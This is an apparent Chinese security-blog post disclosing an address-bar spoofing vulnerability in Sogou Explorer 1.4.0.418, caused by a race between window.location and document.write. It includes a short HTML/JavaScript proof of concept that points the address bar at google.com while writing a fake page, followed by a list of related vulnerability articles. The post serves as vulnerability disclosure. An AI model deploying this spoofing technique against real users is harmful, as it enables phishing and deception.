大西瓜的杂货铺

徐工

搜狗浏览器版本：1.4.0.418(正式版)

漏洞成因：在搜狗浏览器中，window.location和document.write两个函数发生条件竞争阻 塞。“window.location”函数使URL中显示到一个地址域，同时页面元素却可以被“document.write”函数所改写。这样导致攻 击者可以篡改页面，来实施钓鱼欺骗攻击。

效果图：

POC：

<center>
<h1>SogouExplorer spoofing</h1>
</center>
<p>
<a href=”javascript:spoof()”>test!</a>
<p>
<script>
function spoof()
{
window.location = “http://www.google.com”;
document.write(“<title>Google</title>”);
document.write(“<h1>FAKE PAGE</h1>”);
document.write(“xisigr[xeye]“);
}
</script>

相关文章

• 搜狗输入法绕过锁屏保护漏洞
• Android 现漏洞，钓鱼诈骗和弹出广告可能乘虚而入
• QQ2011最新溢出漏洞可致对方QQ崩溃
• 西门子工控系统新漏洞被曝光 中国企业恐受波及
• IE曝出最新安全隐患 黑客可窃取cookie
• .NET框架Padding Oracle Attack扫描
• [转译] 20100924，关于 ASP.NET 漏洞的进一步信息
• 黑客利用ASP.NET漏洞获得电脑的Machine Key
• ASP.NET 惊爆新安全漏洞 攻击者可访问任意文件
• windows快捷方式文件执行漏洞和防御策略